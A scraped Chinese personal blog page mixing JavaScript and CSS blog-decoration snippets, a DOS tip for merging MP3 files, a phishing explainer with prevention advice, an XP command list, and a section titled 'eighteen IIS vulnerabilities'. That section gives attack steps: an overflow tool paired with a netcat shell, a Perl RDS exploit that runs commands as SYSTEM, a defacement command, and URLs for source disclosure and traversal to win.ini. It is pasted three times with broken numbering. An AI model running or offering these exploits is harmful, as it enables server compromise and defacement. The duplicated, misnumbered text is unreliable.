if ( seq >= len ) {
seq = 0;
window.status = '';
window.setTimeout("Helpor_net();", interval );
}
else
window.setTimeout("Helpor_net();", interval );
}
Helpor_net();
</script>
12:点击即可把你的网站添加到浏览器的收藏菜单下
<span style="CURSOR: hand"
onClick="window.external.addFavorite('你的域名','你的网站名')"
title="你的网站名">收藏本站</span>
说明:
你的域名——就是你的博客的网址,也就是首页窗口显示的地址。我的博客域名就是:http://blog.hexun.com/eran/default.aspx
你的网站名——不一定就要写真实的名称,可以写一些吸引人的名字,总之你写什么名字,别人的收藏夹里就显示什么名字。
13:点击即可把你的网站设置为浏览器的起始页
<span onclick="var
strhref="/window.location.href";this.style.behavior='url(#default#homepage)';this.setHomePage('你的域名');"
style="CURSOR: hand">设为首页</span>
说明同上
14:浏览器的状态栏里出现一个字接一个字往左跑的欢迎语!
<script language="JavaScript">
<!--
function statusMessageObject(p,d) {
this.msg = MESSAGE
this.out = " "
this.pos = POSITION
this.delay = DELAY
this.i = 0
this.reset = clearMessage
}
function clearMessage() {
this.pos = POSITION
}
var POSITION = 100
var DELAY = 5
var MESSAGE = "你要显示的文字,如:站长如果依然欢迎来到成长の代价"
var scroll = new statusMessageObject()
function scroller() {
for (scroll.i = 0; scroll.i < scroll.pos; scroll.i++) {
scroll.out += " "
}
if (scroll.pos >= 0)
scroll.out += scroll.msg
else scroll.out =
scroll.msg.substring(-scroll.pos,scroll.msg.length)
window.status = scroll.out
scroll.out = " "
scroll.pos--
if (scroll.pos < -(scroll.msg.length)) {
scroll.reset()
}
setTimeout ('scroller()',scroll.delay)
}
function snapIn(jumpSpaces,position) {
var msg = scroll.msg
var out = ""
for (var i=0; i<position; i++)
{out += msg.charAt(i)}
for (i=1;i<jumpSpaces;i++)
{out += " "}
out += msg.charAt(position)
window.status = out
if (jumpSpaces <= 1) {
position++
if (msg.charAt(position) == ' ')
{position++ }
jumpSpaces = 100-position
} else if (jumpSpaces > 3)
{jumpSpaces *= .75}
else
{jumpSpaces--}
if (position != msg.length) {
var cmd = "snapIn(" + jumpSpaces + "," + position + ")";
scrollID = window.setTimeout(cmd,scroll.delay);
} else {
window.status=""
jumpSpaces=0
position=0
cmd = "snapIn(" + jumpSpaces + "," + position + ")";
scrollID = window.setTimeout(cmd,scroll.delay);
return false
}
return true
}
snapIn(100,0);
// -->
</script>
15 :鼠标一碰就弹出 设为首页 对话框 (烦人,建议不用)
<a href="#"
onmouseover="this.style.behavior='url(#default#homepage)';this.setHomePage('你的域名');return(false);"
style="behavior: url(#default#homepage)">设为主页</a></td>
说明同特效四
16 鼠标一碰就弹出收藏本站对话框(烦人,建议不用)
<a href="#"
onmouseover="javascript :window.external.AddFavorite('你的域名',
'你的网站名')" target="_self">收藏本站</a>
17.在页面中制作由下往上滚动的文字
<table border="0" cellspacing="2" cellpadding="2" width="158" align="center">
<tr>
<td colspan="2">
<div align="center"><marquee direction=up height=150 id=scrollArea onMouseOut=scrollArea.start()
onMouseOver=scrollArea.stop() scrollamount=2 scrolldelay=200 width=200> </div>
<p align="left"> <span class="unnamed1"><span class="ow"><span class="font2"><span class="fon">在很</span><span class="unnamed1"><span class="ow"><span class="font2"><span class="fon">久</span></span></span></span><span class="fon">很久以前<br>
你拥有我 我拥有你<br>
在很久很久以前<br>
你离开我去远空翱翔<br>
外面的世界很精彩<br>
外面的世界很无奈<br>
当你觉得外面的世界很精彩<br>
我会在这里衷心的祝福你 <br>
</span></span></span></span><span class="fon"><span class="font2"><span class="ow"><br>
<span class="font2">每当夕阳西沉的时候<br>
我总是在这里盼望你<br>
天空中虽然下着雨<br>
我依然等待你的归期<br>
外面的世界很精彩<br>
外面的世界很无奈<br>
当你觉得外面的世界很无奈<br>
我还在这里耐心的等着你 <br>
<br>
</span></span></span></span>
</td>
</tr>
</table>
18.更改主体背景色:
body {
font-size: 12px;
font-family: Tahoma, Verdana, "宋体";
background-color: #CCCCCC;
background-position: top left;
background-repeat: repeat-x;
更改主体面板色:
.maintable {
width:768px;
border-color: #999999;
border-style: solid;
border-bottom-width: 0px;
border-right-width: 1px;
border-top-width: 0px;
border-left-width: 1px;
background-color: #F6F6F6;
更改文章背景色及边框色:
.textbox {
background-color: white;
border: 1px dashed #CCCCCC;
}
更改文章标题颜色:
a:link,a:visited {
text-decoration: none;
color: #4073AB;
font-family: Tahoma, Verdana, "宋体";
}
文章下划线的地方是更改颜色代码的地方,换上自己喜欢的颜色就行了。
文中难免有疏漏的地方,请指正。愿所有迷茫的朋友,都尽快有自己称新如意的博客。
使用方法:在“界面风格”里保存完后,回到“常规设置”里再保存一下即可
颜色代码请查阅:
http://lzjthy.vip.sina.com/yansedaima.htm
使用DOS命令合并多个MP3文件
(作者置顶)
你有没有想过把多个MP3合并成单独的一个大MP3那?
有没有想过不借助第三方软件直接来合并你的MP3那?
其实可以使用DOS的简单命令,就可以轻松快速的合并MP3了。
使用的命令是COPY,一个DOS中非常有用也非常常用的命令。
相信会DOS的朋友都用过。
首先来看看这个命令的使用格式:输入“cmd”,进入MS-DOS方式,输入“help copy”
会出现如下图:
很详细地介绍了它使用格式。
这里我们主要利用其参数/b来可以实现将几个文件合并的功能。
比如要把D盘根目录下的1.mp3和2.mp3还有3.mp3合并为4.mp3并保存到F盘
可以这键入:
C:\〉copy /b d:\1.mp3+d:\2.mp3+d:\3.mp3 f:\c.mp3
然后回车就可以了,合并速度非常快速!
你可以看到在F盘里多了一个4.mp3的文件,它就是由1,2,3.mp3合成的
大小成了20多MB!
利用Copy /b,更值的一提的是:
它还支持多种格式,
可以把.wma、.mpeg、.avi、.dat等多种音视频文件连接起来,既简单又方便。
黑客破解口令常用
(作者置顶)
| |||
|
入侵网站必备:(经典语句)
(作者置顶)
| ||
|
Python资源列表(转)
(作者置顶)
| 1 | Python资源列表(转) | |
|
破万象
(作者置顶)
网管必知 IIS中常见的十八个安全漏洞
(作者置顶)
1. IIS4hack缓冲溢出 主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器: c:>iishack.exe 80 /ncx.exe 然后你就使用netcat来连接你要检测的服务器: c:>nc 80 如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip 2.msadc IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help [quack@chat quack]$ perl msadc2.pl -h -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- Usage: msadc.pl -h { -d -X -v } -h = host you want to scan (ip or domain) -d = delay between calls, default 1 second -X = dump Index Server path table, if available -N = query VbBusObj for NetBIOS name -V = use VbBusObj instead of ActiveDataFactory -v = verbose -e = external dictionary file for step 5 -u <\hostsharefile> = use UNC file -w = Windows 95 instead of Windows NT -c = v1 compatibility (three step query) -s = run only step Or a -R will resume a (v2) command session [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/ -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- Type the command line you want to run (cmd /c assumed): cmd /c 如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的: echo hacked by me > d:inetpubwwwrootvictimwebindex.htm 3.Codebrws.asp 察看文件源代码 http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp 4.Showcode.asp 察看文件源代码 http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini 5.Null.htw 察看文件源代码 http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full 6.webhits.dll & .htw hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目: |
format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消
这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)
一个攻击者可以使用如下的方法来访问系统中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代码
7. iis4hack缓冲溢出
主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:
c:>iishack.exe 80 /ncx.exe
然后你就使用netcat来连接你要检测的服务器:
c:>nc 80
如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip
8.msadc
IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Usage: msadc.pl -h { -d -X -v }
-h = host you want to scan (ip or domain)
-d = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\hostsharefile> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s = run only step
Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:
echo hacked by me > d:inetpubwwwrootvictimwebindex.htm
9.Codebrws.asp
察看文件源代码
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
10.Showcode.asp
察看文件源代码
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
11.Null.htw
察看文件源代码
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
12.webhits.dll & .htw
hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:
http://www.victim.com/nosuchfile.htw 如果你从服务器端获得如下信息:
format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消
这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)
一个攻击者可以使用如下的方法来访问系统中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代码
13. iis4hack缓冲溢出
主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:
c:>iishack.exe 80 /ncx.exe
然后你就使用netcat来连接你要检测的服务器:
c:>nc 80
如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip
14.msadc
IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Usage: msadc.pl -h { -d -X -v }
-h = host you want to scan (ip or domain)
-d = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\hostsharefile> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s = run only step
Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:
echo hacked by me > d:inetpubwwwrootvictimwebindex.htm
15.Codebrws.asp
察看文件源代码
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
16.Showcode.asp
察看文件源代码
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
17.Null.htw
察看文件源代码
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
18.webhits.dll & .htw
hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:
http://www.victim.com/nosuchfile.htw 如果你从服务器端获得如下信息:
format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消
这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)
一个攻击者可以使用如下的方法来访问系统中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL:http://www.victim.com/default.asp::$DATA你就得到了源代码。
网络钓鱼
(作者置顶)
网络钓鱼(Phishing)一词,是“Fishing”和“Phone”的综合体,由于黑客始祖起初是以电话作案,所以用“Ph”来取代“F”,创造了”Phishing”。 “网络钓鱼”攻击利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动,受骗者往往会泄露自己的财务数据,如信用卡号、账户用户名、口令和社保编号等内容。诈骗者通常会将自己伪装成知名银行、在线零售商和信用卡公司等可信的品牌,在所有接触诈骗信息的用户中,有高达5%的人都会对这些骗局做出响应。 在美国和英国已经开始出现专门反网络钓鱼的组织,越来越多在线企业、技术公司、安全机构加入到反“网络钓鱼”组织的行列,比如微软、戴尔都宣布设立专案分析师或推出用户教育计划,微软还捐出4.6万美元的软件,协助防治“网络钓鱼”。 |
“网络钓鱼”的主要手法
一是发送电子邮件,以虚假信息引诱用户中圈套。
诈骗分子以垃圾邮件的形式大量发送欺诈性邮件,这些邮件多以中奖、顾问、对账等内容引诱用户在邮件中填入金融账号和密码,或是以各种紧迫的理由要求收件人登录某网页提交用户名、密码、身份证号、信用卡号等信息,继而盗窃用户资金。
如今年2月份发现的一种骗取美邦银行(Smith Barney)用户的账号和密码的“网络钓鱼”电子邮件,该邮件利用了IE的图片映射地址欺骗漏洞,并精心设计脚本程序,用一个显示假地址的弹出窗口遮挡住了IE浏览器的地址栏,使用户无法看到此网站的真实地址。当用户使用未打补丁的Outlook打开此邮件时,状态栏显示的链接是虚假的。
当用户点击链接时,实际连接的是钓鱼网站http://**.41.155.60:87/s。该网站页面酷似Smith Barney银行网站的登陆界面,而用户一旦输入了自己的账号密码,这些信息就会被黑客窃取。
二是建立假冒网上银行、网上证券网站,骗取用户账号密码实施盗窃。
犯罪分子建立起域名和网页内容都与真正网上银行系统、网上证券交易平台极为相似的网站,引诱用户输入账号密码等信息,进而通过真正的网上银行、网上证券系统或者伪造银行储蓄卡、证券交易卡盗窃资金;还有的利用跨站脚本,即利用合法网站服务器程序上的漏洞,在站点的某些网页中插入恶意Html代码,屏蔽住一些可以用来辨别网站真假的重要信息,利用cookies窃取用户信息。
如曾出现过的某假冒银行网站,网址为http://www.1cbc.com.cn/,而真正银行网站是http://www.icbc.com.cn/,犯罪分子利用数字1和字母i非常相近的特点企图蒙蔽粗心的用户。
又如2004年7月发现的某假公司网站(网址为http://www.1enovo.com/),而真正网站为 http://www.lenovo.com/,诈骗者利用了小写字母l和数字1很相近的障眼法。诈骗者通过QQ散布“XX集团和XX公司联合赠送QQ币”的虚假消息,引诱用户访问。
一旦访问该网站,首先生成一个弹出窗口,上面显示“免费赠送QQ币”的虚假消息。而就在该弹出窗口出现的同时,恶意网站主页面在后台即通过多种IE漏洞下载病毒程序lenovo.exe(TrojanDownloader.Rlay),并在2秒钟后自动转向到真正网站主页,用户在毫无觉察中就感染了病毒。
病毒程序执行后,将下载该网站上的另一个病毒程序bbs5.exe,用来窃取用户的传奇账号、密码和游戏装备。当用户通过QQ聊天时,还会自动发送包含恶意网址的消息。
三是利用虚假的电子商务进行诈骗。
此类犯罪活动往往是建立电子商务网站,或是在比较知名、大型的电子商务网站上发布虚假的商品销售信息,犯罪分子在收到受害人的购物汇款后就销声匿迹。如2003年,罪犯佘某建立“奇特器材网”网站,发布出售间谍器材、黑客工具等虚假信息,诱骗顾主将购货款汇入其用虚假身份在多个银行开立的账户,然后转移钱款的案件。
除少数不法分子自己建立电子商务网站外,大部分人采用在知名电子商务网站上,如“易趣”、“淘宝”、“阿里巴巴”等,发布虚假信息,以所谓“超低价”、“免税”、“走私货”、“慈善义卖”的名义出售各种产品,或以次充好,以走私货充行货,很多人在低价的诱惑下上当受骗。网上交易多是异地交易,通常需要汇款。不法分子一般要求消费者先付部分款,再以各种理由诱骗消费者付余款或者其他各种名目的款项,得到钱款或被识破时,就立即切断与消费者的联系。
四是利用木马和黑客技术等手段窃取用户信息后实施盗窃活动。
木马制作者通过发送邮件或在网站中隐藏木马等方式大肆传播木马程序,当感染木马的用户进行网上交易时,木马程序即以键盘记录的方式获取用户账号和密码,并发送给指定邮箱,用户资金将受到严重威胁。
如去年网上出现的盗取某银行个人网上银行账号和密码的木马Troj_HidWebmon及其变种,它甚至可以盗取用户数字证书。又如去年出现的木马“证券大盗”,它可以通过屏幕快照将用户的网页登录界面保存为图片,并发送给指定邮箱。黑客通过对照图片中鼠标的点击位置,就很有可能破译出用户的账号和密码,从而突破软键盘密码保护技术,严重威胁股民网上证券交易安全。
又如2004年3月陈某盗窃银行储户资金一案,陈通过其个人网页向访问者的计算机种植木马,进而窃取访问者的银行账户和密码,再通过电子银行转账实施盗窃行为。
再以某市新华书店网站(http://www.**xhsd.com/)被植入“QQ大盗”木马病毒(Trojan/PSW.QQRobber.14.b)为例。当进入该网站后,页面显示并无可疑之处,但主页代码却在后台以隐藏方式打开另一个恶意网页http://www.dfxhsd.com/icyfox.htm(Exploit.MhtRedir),后者利用IE浏览器的MHT文件下载执行漏洞,在用户不知情中下载恶意CHM文件http://www.dfxhsd.com/icyfox.js,并运行内嵌其中的木马程序(Trojan/PSW.QQRobber.14.b)。木马程序运行后,将把自身复制到系统文件夹;同时添加注册表项,在Windows启动时,木马得以自动运行,并将盗取用户QQ账号、密码甚至身份信息。
五是利用用户弱口令等漏洞破解、猜测用户账号和密码。
不法分子利用部分用户贪图方便设置弱口令的漏洞,对银行卡密码进行破解。如2004年10月,三名犯罪分子从网上搜寻某银行储蓄卡卡号,然后登陆该银行网上银行网站,尝试破解弱口令,并屡屡得手。
实际上,不法分子在实施网络诈骗的犯罪活动过程中,经常采取以上几种手法交织、配合进行,还有的通过手机短信、QQ、msn进行各种各样的“网络钓鱼”不法活动。
“网络钓鱼”防范知识
针对以上不法分子通常采取的网络欺诈手法,广大网上电子金融、电子商务用户可采取如下防范措施:
一、针对电子邮件欺诈,广大网民如收到有如下特点的邮件就要提高警惕,不要轻易打开和听信:一是伪造发件人信息,如ABC@abcbank.com;二是问候语或开场白往往模仿被假冒单位的口吻和语气,如“亲爱的用户”;三是邮件内容多为传递紧迫的信息,如以账户状态将影响到正常使用或宣称正在通过网站更新账号资料信息等;四是索取个人信息,要求用户提供密码、账号等信息。还有一类邮件是以超低价或海关查没品等为诱饵诱骗消费者。
二、针对假冒网上银行、网上证券网站的情况,广大网上电子金融、电子商务用户在进行网上交易时要注意做到以下几点:一是核对网址,看是否与真正网址一致;二是选妥和保管好密码,不要选诸如身份证号码、出生日期、电话号码等作为密码,建议用字母、数字混合密码,尽量避免在不同系统使用同一密码;三是做好交易记录,对网上银行、网上证券等平台办理的转账和支付等业务做好记录,定期查看“历史交易明细”和打印业务对账单,如发现异常交易或差错,立即与有关单位联系;四是管好数字证书,避免在公用的计算机上使用网上交易系统;五是对异常动态提高警惕,如不小心在陌生的网址上输入了账户和密码,并遇到类似“系统维护”之类提示时,应立即拨打有关客服热线进行确认,万一资料被盗,应立即修改相关交易密码或进行银行卡、证券交易卡挂失;六是通过正确的程序登录支付网关,通过正式公布的网站进入,不要通过搜索引擎找到的网址或其他不明网站的链接进入。
三、针对虚假电子商务信息的情况,广大网民应掌握以下诈骗信息特点,不要上当:一是虚假购物、拍卖网站看上去都比较“正规”,有公司名称、地址、联系电话、联系人、电子邮箱等,有的还留有互联网信息服务备案编号和信用资质等;二是交易方式单一,消费者只能通过银行汇款的方式购买,且收款人均为个人,而非公司,订货方法一律采用先付款后发货的方式;三是诈取消费者款项的手法如出一辙,当消费者汇出第一笔款后,骗子会来电以各种理由要求汇款人再汇余款、风险金、押金或税款之类的费用,否则不会发货,也不退款,一些消费者迫于第一笔款已汇出,抱着侥幸心理继续再汇;四是在进行网络交易前,要对交易网站和交易对方的资质进行全面了解。
四、其他网络安全防范措施。一是安装防火墙和防病毒软件,并经常升级;二是注意经常给系统打补丁,堵塞软件漏洞;三是禁止浏览器运行JavaScript和ActiveX代码;四是不要上一些不太了解的网站,不要执行从网上下载后未经杀毒处理的软件,不要打开msn或者QQ上传送过来的不明文件等;五是提高自我保护意识,注意妥善保管自己的私人信息,如本人证件号码、账号、密码等,不向他人透露;尽量避免在网吧等公共场所使用网上电子商务服务。
XP-CMD命令大全
(作者置顶)
有关某个命令的详细信息,请键入 HELP 命令名
ASSOC 显示或修改文件扩展名关联。
AT 计划在计算机上运行的命令和程序。
ATTRIB 显示或更改文件属性。
BREAK 设置或清除扩展式 CTRL+C 检查。
CACLS 显示或修改文件的访问控制列表(ACLs)。
CALL 从另一个批处理程序调用这一个。
CD 显示当前目录的名称或将其更改。
CHCP 显示或设置活动代码页数。
CHDIR 显示当前目录的名称或将其更改。
CHKDSK 检查磁盘并显示状态报告。
CHKNTFS 显示或修改启动时间磁盘检查。
CLS 清除屏幕。
CMD 打开另一个 Windows 命令解释程序窗口。
COLOR 设置默认控制台前景和背景颜色。
COMP 比较两个或两套文件的内容。
COMPACT 显示或更改 NTFS 分区上文件的压缩。
CONVERT 将 FAT 卷转换成 NTFS。您不能转换
当前驱动器。
COPY 将至少一个文件复制到另一个位置。
DATE 显示或设置日期。
DEL 删除至少一个文件。
DIR 显示一个目录中的文件和子目录。
DISKCOMP 比较两个软盘的内容。
DISKCOPY 将一个软盘的内容复制到另一个软盘。
DOSKEY 编辑命令行、调用 Windows 命令并创建宏。
ECHO 显示消息,或将命令回显打开或关上。
ENDLOCAL 结束批文件中环境更改的本地化。
ERASE 删除至少一个文件。
EXIT 退出 CMD.EXE 程序(命令解释程序)。
FC 比较两个或两套文件,并显示
不同处。
FIND 在文件中搜索文字字符串。
FINDSTR 在文件中搜索字符串。
FOR 为一套文件中的每个文件运行一个指定的命令。
FORMAT 格式化磁盘,以便跟 Windows 使用。
FTYPE 显示或修改用于文件扩展名关联的文件类型。
GOTO 将 Windows 命令解释程序指向批处理程序
中某个标明的行。
GRAFTABL 启用 Windows 来以图像模式显示
扩展字符集。
HELP 提供 Windows 命令的帮助信息。
IF 执行批处理程序中的条件性处理。
LABEL 创建、更改或删除磁盘的卷标。
MD 创建目录。
MKDIR 创建目录。
MODE 配置系统设备。
MORE 一次显示一个结果屏幕。
MOVE 将文件从一个目录移到另一个目录。
PATH 显示或设置可执行文件的搜索路径。
PAUSE 暂停批文件的处理并显示消息。
POPD 还原 PUSHD 保存的当前目录的上一个值。
PRINT 打印文本文件。
PROMPT 更改 Windows 命令提示符。
PUSHD 保存当前目录,然后对其进行更改。
RD 删除目录。
RECOVER 从有问题的磁盘恢复可读信息。
REM 记录批文件或 CONFIG.SYS 中的注释。
REN 重命名文件。
RENAME 重命名文件。
REPLACE 替换文件。
RMDIR 删除目录。
SET 显示、设置或删除 Windows 环境变量。
SETLOCAL 开始批文件中环境更改的本地化。
SHIFT 更换批文件中可替换参数的位置。
SORT 对输入进行分类。
START 启动另一个窗口来运行指定的程序或命令。
SUBST 将路径跟一个驱动器号关联。
TIME 显示或设置系统时间。
TITLE 设置 CMD.EXE 会话的窗口标题。
TREE 以图形模式显示驱动器或路径的目录结构。
TYPE 显示文本文件的内容。
VER 显示 Windows 版本。
VERIFY 告诉 Windows 是否验证文件是否已正确
写入磁盘。
VOL 显示磁盘卷标和序列号。
XCOPY 复制文件和目录树。
appwiz.cpl------------添加删除程序control userpasswords2--------用户帐户设置
cleanmgr-------垃圾整理
CMD--------------命令提示符可以当作是 Windows 的一个附件,Ping,Convert 这些不能在图形环境下 使用的功能要借助它来完成。
cmd------jview察看Java虚拟机版本。
command.com------调用的则是系统内置的 NTVDM,一个 DOS虚拟机。它完全是一个类似 Virtual PC 的 虚拟环境,和系统本身联系不大。当我们在命令提示符下运行 DOS 程序时,实际上也 是自动转移到 NTVDM虚拟机下,和 CMD 本身没什么关系。
calc-----------启动计算器chkdsk.exe-----Chkdsk磁盘检查
compmgmt.msc---计算机管理
conf-----------启动 netmeeting
control userpasswords2-----User Account 权限设置
devmgmt.msc--- 设备管理器
diskmgmt.msc---磁盘管理实用程序
dfrg.msc-------磁盘碎片整理程序
drwtsn32------ 系统医生
dvdplay--------启动Media Player
dxdiag-----------DirectX Diagnostic Tool
gpedit.msc-------组策略编辑器
gpupdate /target:computer /force 强制刷新组策略
eventvwr.exe-----事件查看器
explorer-------打开资源管理器
logoff---------注销命令
lusrmgr.msc----本机用户和组
msinfo32---------系统信息
msconfig---------系统配置实用程序
net start (servicename)----启动该服务
net stop (servicename)-----停止该服务
notepad--------打开记事本
nusrmgr.cpl-------同control userpasswords,打开用户帐户控制面板
Nslookup-------IP地址侦测器
oobe/msoobe /a----检查XP是否激活
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit----------注册表编辑器
regedt32-------注册表编辑器
regsvr32 /u *.dll----停止dll文件运行
route print------查看路由表
rononce -p ----15秒关机
rsop.msc-------组策略结果集
rundll32.exe rundll32.exe %Systemroot%System32shimgvw.dll,ImageView_Fullscreen----启动一个空白的Windows 图片和传真查看器
secpol.msc--------本地安全策略
services.msc---本地服务设置
sfc /scannow-----启动系统文件检查器
sndrec32-------录音机
taskmgr-----任务管理器(适用于2000/xp/2003)
tsshutdn-------60秒倒计时关机命令
winchat--------XP自带局域网聊天
winmsd---------系统信息
winver-----显示About Windows 窗口
wupdmgr-----------Windows Update
IE被恶意修改的几大解决办法
(作者置顶)
